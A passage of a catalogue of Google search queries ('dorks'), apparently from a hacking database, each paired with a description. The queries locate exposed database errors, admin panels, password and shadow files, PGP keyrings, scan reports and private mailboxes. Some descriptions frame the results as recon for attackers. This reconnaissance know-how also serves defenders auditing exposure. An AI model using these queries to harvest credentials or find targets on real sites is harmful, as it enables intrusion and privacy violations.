"An SQL Server error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"Unclosed quotation mark before the character string\"", "id": 84}, {"short description": "\"Incorrect syntax near\"", "long description": "An SQL Server error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"Incorrect syntax near\"", "id": 85}, {"short description": "\"Incorrect syntax near\"", "long description": "An SQL Server error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"Incorrect syntax near\" -the", "id": 86}, {"short description": "\"PostgreSQL query failed: ERROR: parser: parse error\"", "long description": "An PostgreSQL error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"PostgreSQL query failed: ERROR: parser: parse error\"", "id": 87}, {"short description": "supplied argument is not a valid PostgreSQL result", "long description": "An PostgreSQL error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"Supplied argument is not a valid PostgreSQL result\"", "id": 88}, {"short description": "\"Syntax error in query expression \" -the", "long description": "An Access error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"Syntax error in query expression \" -the", "id": 89}, {"short description": "\"An illegal character has been 
found in the statement\" -\"previous message\"", "long description": "An Informix error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"An illegal character has been found in the statement\" -\"previous message\"", "id": 90}, {"short description": "\"A syntax error has occurred\" filetype:ihtml", "long description": "An Informix error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers", "submited": "2004-03-04", "request": "\"A syntax error has occurred\" filetype:ihtml", "id": 91}, {"short description": "\"detected an internal error [IBM][CLI Driver][DB2/6000]\"", "long description": "A DB2 error message, this message can display path names, function names, filenames, partial code and program state, all of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"detected an internal error [IBM][CLI Driver][DB2/6000]\"", "id": 92}, {"short description": "An unexpected token \"END-OF-STATEMENT\" was found", "long description": "A DB2 error message, this message can display path names, function names, filenames, partial code and program state, all of which are very helpful for hackers...", "submited": "2004-03-04", "request": "An unexpected token \"END-OF-STATEMENT\" was found", "id": 93}, {"short description": "intitle:\"statistics of\" \"advanced web statistics\"", "long description": "the awstats program shows web statistics for web servers. 
This information includes who is visiting the site, what pages they visit, error codes produced, filetypes hosted on the server, number of hits, and more which can provide very interesting recon information for an attacker.", "submited": "2004-03-04", "request": "intitle:\"statistics of\" \"advanced web statistics\"", "id": 94}, {"short description": "intitle:\"Usage Statistics for\" \"Generated by Webalizer\"", "long description": "The webalizer program shows web statistics for web servers. This information includes who is visiting the site, what pages they visit, error codes produced, filetypes hosted on the server, number of hits, referrers, exit pages, and more which can provide very interesting recon information for an attacker.", "submited": "2004-03-04", "request": "intitle:\"Usage Statistics for\" \"Generated by Webalizer\"", "id": 95}, {"short description": "\"robots.txt\" \"Disallow:\" filetype:txt", "long description": "The robots.txt file serves as a set of instructions for web crawlers. The \"disallow\" tag tells a web crawler where NOT to look, for whatever reason. Hackers will always go to those places first!", "submited": "2004-03-04", "request": "\"robots.txt\" \"Disallow:\" filetype:txt", "id": 96}, {"short description": "\"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL\"", "long description": "This search reveals Postgresql servers in yet another way then we had seen before. Path information appears in the error message and sometimes database names.", "submited": "2004-08-25", "request": "\"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL\"", "id": 97}, {"short description": "\"phpMyAdmin\" \"running on\" inurl:\"main.php\"", "long description": "From phpmyadmin.net : \"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.\" Great, easy to use, but lock it down! 
Things you can do include viewing MySQL runtime information and system variables, show processes, reloading MySQL, changing privileges, and modifying or exporting databases. Hacker-fodder for sure!", "submited": "2004-03-04", "request": "\"phpMyAdmin\" \"running on\" inurl:\"main.php\"", "id": 98}, {"short description": "inurl:main.php phpMyAdmin", "long description": "From phpmyadmin.net : \"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.\" Great, easy to use, but lock it down! Things you can do include viewing MySQL runtime information and system variables, show processes, reloading MySQL, changing privileges, and modifying or exporting databases. Hacker-fodder for sure!", "submited": "2004-03-04", "request": "inurl:main.php phpMyAdmin", "id": 99}, {"short description": "inurl:main.php Welcome to phpMyAdmin", "long description": "From phpmyadmin.net : \"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.\" Great, easy to use, but lock it down! Things you can do include viewing MySQL runtime information and system variables, show processes, reloading MySQL, changing privileges, and modifying or exporting databases. Hacker-fodder for sure!", "submited": "2004-03-04", "request": "inurl:main.php Welcome to phpMyAdmin", "id": 100}, {"short description": "\"Warning: Cannot modify header information - headers already sent\"", "long description": "A PHP error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"Warning: Cannot modify header information - headers already sent\"", "id": 101}, {"short description": "intitle:\"wbem\" compaq login \"Compaq Information Technologies Group\"", "long description": "These devices are running HP Insight Management Agents for Servers which \"provide device information for all managed subsystems. 
Alerts are generated by SNMP traps.\" The information on these pages include server addresses and other assorted SNMP information.", "submited": "2004-03-04", "request": "intitle:\"wbem\" compaq login \"Compaq Information Technologies Group\"", "id": 102}, {"short description": "intitle:osCommerce inurl:admin intext:\"redistributable under the GNU\"intext:\"Online Catalog\" -demo -site:oscommerce.com", "long description": "This is a decent way to explore the admin interface of osCommerce e-commerce sites. Depending on how bad the setup of the web store is, web surfers can even Google their way into customer details and order status, all from the Google cache.", "submited": "2004-03-04", "request": "intitle:osCommerce inurl:admin intext:\"redistributable under the GNU\"intext:\"Online Catalog\" -demo -site:oscommerce.com", "id": 103}, {"short description": "intitle:index.of \"Apache\" \"server at\"", "long description": "This is a very basic string found on directory listing pages which show the version of the Apache web server. 
Hackers can use this information to find vulnerable targets without querying the servers.", "submited": "2004-03-04", "request": "intitle:index.of \"Apache\" \"server at\"", "id": 104}, {"short description": "\"access denied for user\" \"using password\"", "long description": "Another SQL error message, this message can display the username, database, path names and partial SQL code, all of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"access denied for user\" \"using password\"", "id": 105}, {"short description": "intitle:\"Under construction\" \"does not currently have\"", "long description": "This error message can be used to narrow down the operating system and web server version which can be used by hackers to mount a specific attack.", "submited": "2004-03-04", "request": "intitle:\"Under construction\" \"does not currently have\"", "id": 106}, {"short description": "\"seeing this instead\" intitle:\"test page for apache\"", "long description": "This is the default web page for Apache 1.3.11 - 1.3.26. Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. In addition, this indicates that the web server is not well maintained.", "submited": "2004-03-04", "request": "\"seeing this instead\" intitle:\"test page for apache\"", "id": 107}, {"short description": "intitle:\"Test Page for Apache\" \"It Worked!\"", "long description": "This is the default web page for Apache 1.2.6 - 1.3.9. Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. In addition, this indicates that the web server is not well maintained.", "submited": "2004-03-04", "request": "intitle:\"Test Page for Apache\" \"It Worked!\"", "id": 108}, {"short description": "intitle:\"Test Page for Apache\" \"It Worked!\" \"on this web\"", "long description": "This is the default web page for Apache 1.2.6 - 1.3.9. 
Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. In addition, this indicates that the web server is not well maintained.", "submited": "2004-03-04", "request": "intitle:\"Test Page for Apache\" \"It Worked!\" \"on this web\"", "id": 109}, {"short description": "\"Can't connect to local\" intitle:warning", "long description": "Another SQL error message, this message can display database name, path names and partial SQL code, all of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"Can't connect to local\" intitle:warning", "id": 110}, {"short description": "intitle:index.of dead.letter", "long description": "dead.letter contains the contents of unfinished emails created on the UNIX platform. Emails (finished or not) can contain sensitive information.", "submited": "2004-03-04", "request": "intitle:index.of dead.letter", "id": 111}, {"short description": "intitle:index.of ws_ftp.ini", "long description": "ws_ftp.ini is a configuration file for a popular FTP client that stores usernames, (weakly) encoded passwords, sites and directories that the user can store for later reference. These should not be on the web!", "submited": "2004-03-04", "request": "intitle:index.of ws_ftp.ini", "id": 112}, {"short description": "intitle:index.of administrators.pwd", "long description": "This file contains administrative user names and (weakly) encrypted password for Microsoft Front Page. The file should not be readble to the general public.", "submited": "2004-03-04", "request": "intitle:index.of administrators.pwd", "id": 113}, {"short description": "inurl:secring ext:skr | ext:pgp | ext:bak", "long description": "This file is the secret keyring for PGP encryption. Armed with this file (and perhaps a passphrase), a malicious user can read all your encrypted files! 
This should not be posted on the web!", "submited": "2004-03-04", "request": "inurl:secring ext:skr | ext:pgp | ext:bak", "id": 114}, {"short description": "intitle:Index.of etc shadow", "long description": "This file contains usernames and (lame) encrypted passwords! Armed with this file and a decent password cracker, an attacker can crack passwords and log into a UNIX system.", "submited": "2004-03-04", "request": "intitle:Index.of etc shadow", "id": 115}, {"short description": "inurl:ManyServers.htm", "long description": "Microsoft Terminal Services Multiple Clients pages. These pages are not necessarily insecure, sine many layers of security can be wrapped around the actual use of this service, but simply being able to find these in Google gives hackers an informational advantage, and many of the sites are not implemented securely.", "submited": "2004-03-04", "request": "inurl:ManyServers.htm", "id": 116}, {"short description": "intitle:\"Terminal Services Web Connection\"", "long description": "Microsoft Terminal Services Web Connector pages. These pages are not necessarily insecure, sine many layers of security can be wrapped around the actual use of this service, but simply being able to find these in Google gives hackers an informational advantage, and many of the sites are not implemented securely. In the worst case scenario these pages may allow an attacker to bypass a firewall gaining access to a \"protected\" machine.", "submited": "2004-03-04", "request": "intitle:\"Terminal Services Web Connection\"", "id": 117}, {"short description": "intitle:\"Remote Desktop Web Connection\"", "long description": "Microsoft Remote Desktop Connection Web Connection pages. These pages are not necessarily insecure, sine many layers of security can be wrapped around the actual use of this service, but simply being able to find these in Google gives hackers an informational advantage, and many of the sites are not implemented securely. 
In the worst case scenario these pages may allow an attacker to bypass a firewall gaining access to an otherwise inaccessible machine.", "submited": "2004-03-04", "request": "intitle:\"Remote Desktop Web Connection\"", "id": 118}, {"short description": "\"Welcome to Intranet\"", "long description": "According to whatis.com: \"An intranet is a private network that is contained within an enterprise. [...] The main purpose of an intranet is to share company information and computing resources among employees [...] and in general looks like a private version of the Internet.\" Intranets, by definition, should not be available to the Internet's unwashed masses as they may contain private corporate information.", "submited": "0000-00-00", "request": "\"Welcome to Intranet\"", "id": 119}, {"short description": "inurl:search.php vbulletin", "long description": "Version 3.0.0 candidate 4 and earlier of Vbulletin may have a cross-site scripting vulnerability. See http://www.securityfocus.com/bid/9656 for more info.", "submited": "2004-03-04", "request": "inurl:search.php vbulletin", "id": 120}, {"short description": "inurl:footer.inc.php", "long description": "From http://www.securityfocus.com/bid/9664, the AllMyPHP family of products (Versions 0.1.2 - 0.4) contains several potential vulnerabilities, some allowing an attacker to execute malicious code on the web server.", "submited": "2004-03-14", "request": "inurl:footer.inc.php", "id": 121}, {"short description": "inurl:info.inc.php", "long description": "From http://www.securityfocus.com/bid/9664, the AllMyPHP family of products (Versions 0.1.2 - 0.4) contains several potential vulnerabilities, some allowing an attacker to execute malicious code on the web server.", "submited": "2004-03-14", "request": "inurl:info.inc.php", "id": 122}, {"short description": "inurl:admin intitle:login", "long description": "This search can find administrative login pages. 
Not a vulnerability in and of itself, this query serves as a locator for administrative areas of a site. Further investigation of the surrounding directories can often reveal interesting information.", "submited": "2004-03-14", "request": "inurl:admin intitle:login", "id": 123}, {"short description": "intitle:admin intitle:login", "long description": "This search can find administrative login pages. Not a vulnerability in and of itself, this query serves as a locator for administrative areas of a site. Further investigation of the surrounding directories can often reveal interesting information.", "submited": "2004-03-14", "request": "intitle:admin intitle:login", "id": 124}, {"short description": "filetype:asp \"Custom Error Message\" Category Source", "long description": "This is an ASP error message that can reveal information such as compiler used, language used, line numbers, program names and partial source code.", "submited": "2004-03-16", "request": "filetype:asp \"Custom Error Message\" Category Source", "id": 125}, {"short description": "\"Fatal error: Call to undefined function\" -reply -the -next", "long description": "This error message can reveal information such as compiler used, language used, line numbers, program names and partial source code.", "submited": "2004-03-16", "request": "\"Fatal error: Call to undefined function\" -reply -the -next", "id": 126}, {"short description": "inurl:admin filetype:xls", "long description": "This search can find Excel spreadsheets in an administrative directory or of an administrative nature. Many times these documents contain sensitive information.", "submited": "2004-03-16", "request": "inurl:admin filetype:xls", "id": 127}, {"short description": "inurl:admin inurl:userlist", "long description": "This search reveals userlists of administrative importance. 
Userlists found using this method can range from benign \"message group\" lists to system userlists containing passwords.", "submited": "2004-03-16", "request": "inurl:admin inurl:userlist", "id": 128}, {"short description": "inurl:admin filetype:asp inurl:userlist", "long description": "This search reveals userlists of administrative importance. Userlists found using this method can range from benign \"message group\" lists to system userlists containing passwords.", "submited": "2004-03-16", "request": "inurl:admin filetype:asp inurl:userlist", "id": 129}, {"short description": "inurl:backup intitle:index.of inurl:admin", "long description": "This query reveals backup directories. These directories can contain various information ranging from source code, sql tables, userlists, and even passwords.", "submited": "2004-03-16", "request": "inurl:backup intitle:index.of inurl:admin", "id": 130}, {"short description": "\"Welcome to PHP-Nuke\" congratulations", "long description": "This finds default installations of the postnuke CMS system. In many cases, default installations can be insecure especially considering that the administrator hasn't gotten past the first few installation steps.", "submited": "2004-03-18", "request": "\"Welcome to PHP-Nuke\" congratulations", "id": 131}, {"short description": "allintitle:Netscape FastTrack Server Home Page", "long description": "This finds default installations of Netscape Fasttrack Server. In many cases, default installations can be insecure especially considering that the administrator hasn't gotten past the first few installation steps.", "submited": "2004-03-18", "request": "allintitle:Netscape FastTrack Server Home Page", "id": 132}, {"short description": "\"Welcome to phpMyAdmin\" \" Create new database\"", "long description": "phpMyAdmin is a widly spread webfrontend used to mantain sql databases. 
The default security mechanism is to leave it up to the admin of the website to put a .htaccess file in the directory of the application. Well guess what, obviously some admins are either too lazy or don't know how to secure their directories. These pages should obviously not be accessible to the public without some kind of password ;-)", "submited": "2003-08-12", "request": "\"Welcome to phpMyAdmin\" \" Create new database\"", "id": 133}, {"short description": "intitle:\"Index of c:\\Windows\"", "long description": "These pages indicate that they are sharing the C:\\WINDOWS directory, which is the system folder for many Windows installations.", "submited": "2004-02-10", "request": "intitle:\"Index of c:\\Windows\"", "id": 134}, {"short description": "warning \"error on line\" php sablotron", "long description": "sablotron is an XML toolkit thingie. This query hones in on error messages generated by this toolkit. These error messages reveal all sorts of interesting stuff such as source code snippets, path and filename info, etc.", "submited": "2004-03-11", "request": "warning \"error on line\" php sablotron", "id": 135}, {"short description": "\"Most Submitted Forms and Scripts\" \"this section\"", "long description": "More www statistics on the web. This one is very nice.. Lots of directory info, and client access statistics, email addresses.. lots of good stuff. These are SOOO dangerous, especially if INTRANET users get logged... talk about mapping out an intranet quickly...", "submited": "2004-03-22", "request": "\"Most Submitted Forms and Scripts\" \"this section\"", "id": 136}, {"short description": "inurl:changepassword.asp", "long description": "This is a common script for changing passwords. Now, this doesn't actually reveal the password, but it provides great information about the security layout of a server. 
These links can be used to troll around a website.", "submited": "2004-03-24", "request": "inurl:changepassword.asp", "id": 137}, {"short description": "\"Select a database to view\" intitle:\"filemaker pro\"", "long description": "An oldie but a goodie. This search locates servers which provides access to Filemaker pro databases via the web. The severity of this search varies wildly depending on the security of the database itself. Regardless, if Google can crawl it, it's potentially using cleartext authentication.", "submited": "2004-03-29", "request": "\"Select a database to view\" intitle:\"filemaker pro\"", "id": 138}, {"short description": "\"not for distribution\" confidential", "long description": "The terms \"not for distribution\" and confidential indicate a sensitive document. Results vary wildly, but web-based documents are for public viewing, and should neither be considered confidential or private.", "submited": "2004-03-29", "request": "\"not for distribution\" confidential", "id": 139}, {"short description": "\"Thank you for your order\" +receipt", "long description": "After placing an order via the web, many sites provide a page containing the phrase \"Thank you for your order\" and provide a receipt for future reference. At the very least, these pages can provide insight into the structure of a web-based shop.", "submited": "2004-03-29", "request": "\"Thank you for your order\" +receipt", "id": 140}, {"short description": "allinurl:intranet admin", "long description": "According to whatis.com: \"An intranet is a private network that is contained within an enterprise. [...] The main purpose of an intranet is to share company information and computing resources among employees [...] and in general looks like a private version of the Internet.\" Intranets, by definition should not be available to the Internet's unwashed masses as they may contain private corporate information. 
Some of these pages are simply portals to an Intranet site, which helps with information gathering.", "submited": "2004-03-29", "request": "allinurl:intranet admin", "id": 141}, {"short description": "intitle:\"Nessus Scan Report\" \"This file was generated by Nessus\"", "long description": "This search yeids nessus scan reports. Even if some of the vulnerabilities have been fixed, we can still gather valuable information about the network/hosts. This also works with ISS and any other vulnerability scanner which produces reports in html or text format.", "submited": "2004-03-30", "request": "intitle:\"Nessus Scan Report\" \"This file was generated by Nessus\"", "id": 142}, {"short description": "intitle:\"index.of.personal\"", "long description": "This directory has various personal documents and pictures.", "submited": "2004-03-29", "request": "intitle:\"index.of.personal\"", "id": 143}, {"short description": "\"This report lists\" \"identified by Internet Scanner\"", "long description": "This search yeids ISS scan reports, revealing potential vulnerabilities on hosts and networks. Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned.", "submited": "2004-03-30", "request": "\"This report lists\" \"identified by Internet Scanner\"", "id": 144}, {"short description": "\"Network Host Assessment Report\" \"Internet Scanner\"", "long description": "This search yeids ISS scan reports, revealing potential vulnerabilities on hosts and networks. Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned.", "submited": "2004-03-30", "request": "\"Network Host Assessment Report\" \"Internet Scanner\"", "id": 145}, {"short description": "\"Network Vulnerability Assessment Report\"", "long description": "This search yeids vulnerability scanner reports, revealing potential vulnerabilities on hosts and networks. 
Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned.", "submited": "2004-03-30", "request": "\"Network Vulnerability Assessment Report\"", "id": 146}, {"short description": "\"Host Vulnerability Summary Report\"", "long description": "This search yeids host vulnerability scanner reports, revealing potential vulnerabilities on hosts and networks. Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned.", "submited": "2004-03-30", "request": "\"Host Vulnerability Summary Report\"", "id": 147}, {"short description": "intitle:index.of inbox", "long description": "This search reveals potential location for mailbox files. In some cases, the data in this directory or file may be of a very personal nature and may include sent and received emails and archives of email data.", "submited": "2004-04-05", "request": "intitle:index.of inbox", "id": 148}, {"short description": "intitle:index.of inbox dbx", "long description": "This search reveals potential location for mailbox files. In some cases, the data in this directory or file may be of a very personal nature and may include sent and received emails and archives of email data.", "submited": "2004-04-05", "request": "intitle:index.of inbox dbx", "id": 149}, {"short description": "intitle:index.of cleanup.log", "long description": "This search reveals potential location for mailbox files by keying on the Outlook Express cleanup.log file. In some cases, the data in this directory or file may be of a very personal nature and may include sent and received emails and archives of email data.", "submited": "2004-04-05", "request": "intitle:index.of inbox dbx", "id": 150}, {"short description": "\"#mysql dump\" filetype:sql", "long description": "This reveals mySQL database dumps. 
These database dumps list the structure and content of databases, which can reveal many different types of sensitive information.", "submited": "2004-04-05", "request": "\"#mysql dump\" filetype:sql", "id": 151}, {"short description": "allinurl:install/install.php", "long description": "Pages with install/install.php files may be in the process of installing a new service or program. These servers may be insecure due to insecure default settings. In some cases, these servers may allow for a new installation of a program or service with insecure settings. In other cases, snapshot data about an install process can be gleaned from cached page images.", "submited": "2004-04-06", "request": "allinurl:install/install.php", "id": 152}, {"short description": "inurl:vbstats.php \"page generated\"", "long description": "This is your typical stats page listing referrers and top ips and such. This information can certainly be used to gather information about a site and its visitors.", "submited": "2004-04-08", "request": "inurl:vbstats.php \"page generated\"", "id": 153}, {"short description": "\"index of\" / lck", "long description": "These lock files often contain usernames of the user that has locked the file. Username harvesting can be done using this technique.", "submited": "2004-04-13", "request": "\"index of\" / lck", "id": 154}, {"short description": "\"Index of\" / \"chat/logs\"", "long description": "This search reveals chat logs. Depending on the contents of the logs, these files could contain just about anything!", "submited": "2004-04-13", "request": "\"Index of\" / \"chat/logs\"", "id": 155}, {"short description": "index.of perform.ini", "long description": "This file contains information about the mIRC client and may include channel and user names.", "submited": "2004-04-13", "request": "index.of perform.ini", "id": 156}, {"short description": "\"SnortSnarf alert page\"", "long description": "snort is an intrusion detection system. 
SnortSnarf creates pretty web pages from intrusion detection data. These pages show what the bad guys are doing to a system. Generally, it's a bad idea to show the bad guys what you've noticed.", "submited": "2004-04-16", "request": "\"SnortSnarf alert page\"", "id": 157}, {"short description": "inurl:\"newsletter/admin/\" intitle:\"newsletter admin\"", "long description": "These pages generally contain newsletter administration pages. Some of these sites are password protected, others are not, allowing unauthorized users to send mass emails to an entire mailing list.", "submited": "2004-04-16", "request": "inurl:\"newsletter/admin/\" intitle:\"newsletter admin\"", "id": 158}, {"short description": "inurl:\"newsletter/admin/\"", "long description": "These pages generally contain newsletter administration pages. Some of these sites are password protected, others are not, allowing unauthorized users to send mass emails to an entire mailing list. This is a less accurate search than the similar intitle:\"newsletter admin\" search.", "submited": "2004-04-16", "request": "inurl:\"newsletter/admin/\"", "id": 159}, {"short description": "inurl:phpSysInfo/ \"created by phpsysinfo\"", "long description": "This statistics program allows an admin to view stats about a webserver. Some sites leave this in a publicly accessible web page. 
Hackers could have access to data such as the real IP address of the server, server memory usage, general system info such as OS, type of chip, hard-drive makers and much more.", "submited": "2004-04-16", "request": "inurl:phpSysInfo/ \"created by phpsysinfo\"", "id": 160}, {"short description": "allinurl: admin mdb", "long description": "Not all of these pages are administrator's access databases containing usernames, passwords and other sensitive information, but many are!", "submited": "2004-04-16", "request": "allinurl: admin mdb", "id": 161}, {"short description": "allinurl:\"exchange/logon.asp\"", "long description": "According to Microsoft \"Microsoft (R) Outlook (TM) Web Access is a Microsoft Exchange Active Server Application that gives you private access to your Microsoft Outlook or Microsoft Exchange personal e-mail account so that you can view your Inbox from any Web Browser. It also allows you to view Exchange server public folders and the Address Book from the World Wide Web. Anyone can post messages anonymously to public folders or search for users in the Address Book. \" Now, consider for a moment and you will understand why this could be potentially bad.", "submited": "2004-04-16", "request": "allinurl:\"exchange/logon.asp\"", "id": 162}, {"short description": "intitle:\"Index of\" cfide", "long description": "This is the top level directory of ColdFusion, a powerful web development environment. This directory most likely contains sensitive information about a ColdFusion developed site.", "submited": "2004-04-19", "request": "intitle:\"Index of\" cfide", "id": 163}, {"short description": "intitle:\"ColdFusion Administrator Login\"", "long description": "This is the default login page for ColdFusion administration. Although many of these are secured, this is an indicator of a default installation, and may be inherantly insecure. 
In addition, this search provides good information about the version of ColdFusion as well as the fact that ColdFusion is installed on the server.", "submited": "2004-04-19", "request": "intitle:\"ColdFusion Administrator Login\"", "id": 164}, {"short description": "intitle:\"Error Occurred\" \"The error occurred in\" filetype:cfm", "long description": "This is a typical error message from ColdFusion. A good amount of information is available from an error message like this including lines of source code, full pathnames, SQL query info, database name, SQL state info and local time info.", "submited": "2004-04-19", "request": "intitle:\"Error Occurred\" \"The error occurred in\" filetype:cfm", "id": 165}, {"short description": "inurl:login.cfm", "long description": "This is the default login page for ColdFusion. Although many of these are secured, this is an indicator of a default installation, and may be inherantly insecure. In addition, this search provides good information about the version of ColdFusion as well as the fact that ColdFusion is installed on the server.", "submited": "2004-04-19", "request": "inurl:login.cfm", "id": 166}, {"short description": "filetype:cfm \"cfapplication name\" password", "long description": "These files contain ColdFusion source code. In some cases, the pages are examples that are found in discussion forums. However, in many cases these pages contain live sourcecode with usernames, database names or passwords in plaintext.", "submited": "2004-04-19", "request": "filetype:cfm \"cfapplication name\" password", "id": 167}, {"short description": "inurl:\":10000\" intext:webmin", "long description": "Webmin is a html admin interface for Unix boxes. 
It is run on a proprietary web server listening on the default port of 10000.", "submited": "2004-04-20", "request": "inurl:\":10000\" intext:webmin", "id": 168}, {"short description": "allinurl:/examples/jsp/snp/snoop.jsp", "long description": "These pages reveal information about the server including path information, port information, etc.", "submited": "2004-04-20", "request": "allinurl:/examples/jsp/snp/snoop.jsp", "id": 169}, {"short description": "allinurl:servlet/SnoopServlet", "long description": "These pages reveal server information such as port, server software version, server name, full paths, etc.", "submited": "2004-04-20", "request": "allinurl:servlet/SnoopServlet", "id": 170}, {"short description": "intitle:\"Test Page for Apache\"", "long description": "This is the default web page for Apache 1.2.6 - 1.3.9. Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. In addition, this indicates that the web server is not well maintained.", "submited": "2004-04-20", "request": "intitle:\"Test Page for Apache\"", "id": 171}, {"short description": "inurl:login.asp", "long description": "This is a typical login page. It has recently become a target for SQL injection. Comsec's article at http://www.governmentsecurity.org/articles/SQLinjectionBasicTutorial.php brought this to my attention.", "submited": "2004-04-21", "request": "inurl:login.asp", "id": 172}, {"short description": "inurl:/admin/login.asp", "long description": "This is a typical login page. It has recently become a target for SQL injection. Comsec's article at http://www.governmentsecurity.org/articles/SQLinjectionBasicTutorial.php brought this to my attention.", "submited": "2004-04-21", "request": "inurl:/admin/login.asp", "id": 173}, {"short description": "\"Running in Child mode\"", "long description": "This is a gnutella client that was picked up by google. 
There is a lot of data present including transfer statistics, port numbers, operating system, memory, processor speed, ip addresses, and gnutella client versions.", "submited": "2004-04-21", "request": "\"Running in Child mode\"", "id": 174}, {"short description": "\"This is a Shareaza Node\"", "long description": "These pages are from Shareaza client programs. Various data is displayed including client version, ip address, listening ports and uptime.", "submited": "2004-04-21", "request": "\"This is a Shareaza Node\"", "id": 175}, {"short description": "\"VNC Desktop\" inurl:5800", "long description": "VNC is a remote-controlled desktop product. Depending on the configuration, remote users may not be presented with a password. Even when presented with a password, the mere existence of VNC can be important to an attacker, as is the open port of 5800.", "submited": "2004-04-21", "request": "\"VNC Desktop\" inurl:5800", "id": 176}, {"short description": "\"index of cgi-bin\"", "long description": "CGI directories contain scripts which can often be exploited by attackers. Regardless of the vulnerability of such scripts, a directory listing of these scripts can prove helpful.", "submited": "2004-04-23", "request": "\"index of cgi-bin\"", "id": 177}, {"short description": "intitle:Snap.Server inurl:Func=", "long description": "This page reveals the existence of a SNAP server (Network attached server or NAS devices). Depending on the configuration, these servers may be vulnerable, but regardless the existence of this server is useful for information gathering.", "submited": "2004-04-23", "request": "intitle:Snap.Server inurl:Func=", "id": 178}, {"short description": "inurl:server-status \"apache\"", "long description": "This page shows all sorts of information about the Apache web server. 
It can be used to track process information, directory maps, connection data, etc.", "submited": "2004-04-26", "request": "inurl:server-status \"apache\"", "id": 179}, {"short description": "eggdrop filetype:user user", "long description": "These are eggdrop config files. Avoiding a full-blown descussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users.", "submited": "2004-04-26", "request": "eggdrop filetype:user user", "id": 180}, {"short description": "intitle:\"index of\" intext:connect.inc", "long description": "These files often contain usernames and passwords for connection to mysql databases. In many cases, the passwords are not encoded or encrypted.", "submited": "2004-04-26", "request": "intitle:\"index of\" intext:connect.inc", "id": 181}, {"short description": "intitle:\"MikroTik RouterOS Managing Webpage\"", "long description": "This is the front page entry point to a \"Mikro Tik\" Router.", "submited": "2004-04-26", "request": "intitle:\"MikroTik RouterOS Managing Webpage\"", "id": 182}, {"short description": "inurl:fcgi-bin/echo", "long description": "This is the fastcgi echo script, which provides a great deal of information including port numbers, server software versions, port numbers, ip addresses, path names, file names, time zone, process id's, admin email, fqdns, etc!", "submited": "2004-04-28", "request": "inurl:fcgi-bin/echo", "id": 183}, {"short description": "inurl:cgi-bin/printenv", "long description": "This is the print environemnts script which lists sensitive information such as path names, server names, port numbers, server software and version numbers, administrator email addresses and more.", "submited": "2004-04-28", "request": "inurl:cgi-bin/printenv", "id": 184}, {"short description": "intitle:\"Execution of this script not permitted\"", "long description": "This is a cgiwrap error message which displays admin name and email, port numbers, path names, and may also 
include optional information like phone numbers for support personnel.", "submited": "2004-04-28", "request": "intitle:\"Execution of this script not permitted\"", "id": 185}, {"short description": "inurl:perl/printenv", "long description": "This is the print environemnts script which lists sensitive information such as path names, server names, port numbers, server software and version numbers, administrator email addresses and more.", "submited": "2004-04-28", "request": "inurl:perl/printenv", "id": 186}, {"short description": "inurl:j2ee/examples/jsp", "long description": "This directory contains sample JSP scripts which are installed on the server. These programs may have security vulnerabilities and can be used by an attacker to footprint the server.", "submited": "2004-04-28", "request": "inurl:j2ee/examples/jsp", "id": 187}, {"short description": "inurl:ojspdemos", "long description": "This directory contains sample Oracle JSP scripts which are installed on the server. These programs may have security vulnerabilities and can be used by an attacker to footprint the server.", "submited": "2004-04-28", "request": "inurl:ojspdemos", "id": 188}, {"short description": "inurl:server-info \"Apache Server Information\"", "long description": "This is the Apache server-info program. There is so much sensitive stuff listed on this page that it's hard to list it all here. Some informatino listed here includes server version and build, software versions, hostnames, ports, path info, modules installed, module info, configuration data and so much more....", "submited": "2004-04-28", "request": "inurl:server-info \"Apache Server Information\"", "id": 189}, {"short description": "inurl:pls/admin_/gateway.htm", "long description": "This is a default login portal used by Oracle. 
In addition to the fact that this file can be used to footprint a web server and determine its version and software, this page has been targeted in many vulnerability reports as being a source of an SQL injection vulnerability. This problem, when exploited, can lead to unauthorized privileges to the database. In addition, this page may allow unauthorized modification of parameters on the server.", "submited": "2004-04-28", "request": "inurl:pls/admin_/gateway.htm", "id": 190}, {"short description": "inurl:/pls/sample/admin_/help/", "long description": "This is the default installation location of Oracle manuals. This helps in footprinting a server, allowing an attacker to determine software version information which may aid in an attack.", "submited": "2004-04-28", "request": "inurl:/pls/sample/admin_/help/", "id": 191}, {"short description": "intitle:\"Gateway Configuration Menu\"", "long description": "This is a normally protected configuration menu for Oracle Portal Database Access Descriptors (DADs) and Listener settings. This page is normally password protected, but Google has uncovered sites which are not protected. Attackers can make changes to the servers found with this query.", "submited": "2004-04-28", "request": "intitle:\"Gateway Configuration Menu\"", "id": 192}, {"short description": "intitle:\"Remote Desktop Web Connection\" inurl:tsweb", "long description": "This is the login page for Microsoft's Remote Desktop Web Connection, which allows remote users to connect to (and optionally control) a user's desktop. Although 